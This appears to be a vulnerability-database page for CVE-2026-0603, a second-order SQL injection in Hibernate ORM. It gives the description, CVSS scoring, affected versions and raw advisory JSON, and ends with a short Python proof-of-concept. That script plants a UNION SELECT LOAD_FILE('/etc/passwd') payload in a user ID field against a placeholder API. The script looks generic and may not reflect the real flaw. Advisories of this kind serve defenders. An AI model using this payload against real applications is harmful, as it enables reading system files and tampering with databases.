Security Vulnerability Report
中文
CVE-2026-0603 CVSS 8.3 HIGH

CVE-2026-0603

Published: 2026-01-23 07:15:54
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A flaw was found in Hibernate. A remote attacker with low privileges could exploit a second-order SQL injection vulnerability by providing specially crafted, unsanitized non-alphanumeric characters in the ID column when the InlineIdsOrClauseBuilder is used. This could lead to sensitive information disclosure, such as reading system files, and allow for data manipulation or deletion within the application's database, resulting in an application level denial of service.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Hibernate ORM < 5.6.15.Final
Hibernate ORM 6.0.0 - 6.1.x < 6.1.7.Final
Hibernate ORM 6.2.0 - 6.2.x < 6.2.3.Final

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0603 PoC - Hibernate Second-Order SQL Injection # Target: Hibernate ORM with InlineIdsOrClauseBuilder # This PoC demonstrates the second-order SQL injection via ID column import requests import json TARGET_URL = "http://target-application.com/api" def exploit_second_order_sqli(): """ Step 1: Register user with malicious ID payload """ malicious_payload = "1' UNION SELECT LOAD_FILE('/etc/passwd')--" register_data = { "username": "attacker", "email": "[email protected]", "id": malicious_payload # Injecting malicious ID } response = requests.post(f"{TARGET_URL}/users/register", json=register_data) print(f"[+] User registration response: {response.status_code}") """ Step 2: Trigger the vulnerable query (second-order injection) When InlineIdsOrClauseBuilder processes the stored ID, the malicious payload is executed """ trigger_data = { "action": "list_users", "user_ids": [malicious_payload] # Triggers InlineIdsOrClauseBuilder } response = requests.post(f"{TARGET_URL}/users/query", json=trigger_data) print(f"[+] Query trigger response: {response.status_code}") if response.status_code == 200: print("[+] SQL Injection successful - sensitive data may be exposed") print(f"Response: {response.text}") return response.text if __name__ == "__main__": exploit_second_order_sqli()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0603", "sourceIdentifier": "[email protected]", "published": "2026-01-23T07:15:53.660", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Hibernate. A remote attacker with low privileges could exploit a second-order SQL injection vulnerability by providing specially crafted, unsanitized non-alphanumeric characters in the ID column when the InlineIdsOrClauseBuilder is used. This could lead to sensitive information disclosure, such as reading system files, and allow for data manipulation or deletion within the application's database, resulting in an application level denial of service."}, {"lang": "es", "value": "Se encontró una falla en Hibernate. Un atacante remoto con pocos privilegios podría explotar una vulnerabilidad de inyección SQL de segundo orden al proporcionar caracteres no alfanuméricos especialmente diseñados y no saneados en la columna ID cuando se utiliza el InlineIdsOrClauseBuilder. Esto podría llevar a la revelación de información sensible, como la lectura de archivos del sistema, y permitir la manipulación o eliminación de datos dentro de la base de datos de la aplicación, lo que resultaría en una denegación de servicio a nivel de aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:4915", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4916", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4917", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4924", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:6011", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:6012", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-0603", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427147", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.